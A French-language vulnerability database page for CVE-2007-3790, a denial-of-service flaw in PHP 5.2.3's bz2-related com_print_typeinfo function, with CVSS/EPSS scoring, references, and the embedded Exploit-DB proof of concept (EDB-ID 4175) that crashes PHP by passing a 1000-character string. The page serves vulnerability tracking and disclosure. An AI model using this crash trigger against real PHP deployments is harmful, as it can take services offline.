CVE-2007-3790 : Détail

CVE-2007-3790

0.5%V3
Network
2007-07-15
21h00 +00:00
2017-09-28
10h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

The com_print_typeinfo function in the bz2 extension in PHP 5.2.3 allows context-dependent attackers to cause a denial of service via a long argument.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 5.8 AV:N/AC:M/Au:N/C:N/I:P/A:P [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 4175

Date de publication : 2007-07-11 22h00 +00:00
Auteur : shinnai
EDB Vérifié : Yes

<?php //PHP 5.2.3 bz2 com_print_typeinfo() Remote DoS Exploit //author: shinnai //mail: shinnai[at]autistici[dot]org //site: http://shinnai.altervista.org //Tested on xp sp2, worked both from the cli and on apache //Bug discovered with "Footzo" (thanks to rgod). // //To download Footzo: //original link: http://godr.altervista.org/index.php?mod=Download/useful_tools#footzo.rar //alternative: http://www.shinnai.altervista.org/index.php?mod=Download/Utilities#footzo.rar if (!extension_loaded("bz2")){die("you need bz2 extension loaded!");} $buff = str_repeat("a",1000); com_print_typeinfo($buff); ?> # milw0rm.com [2007-07-12]

Products Mentioned

Configuraton 0

Php>>Php >> Version 5.2.3

Références

https://www.exploit-db.com/exploits/4175
Tags : exploit, x_refsource_EXPLOIT-DB
http://osvdb.org/36854
Tags : vdb-entry, x_refsource_OSVDB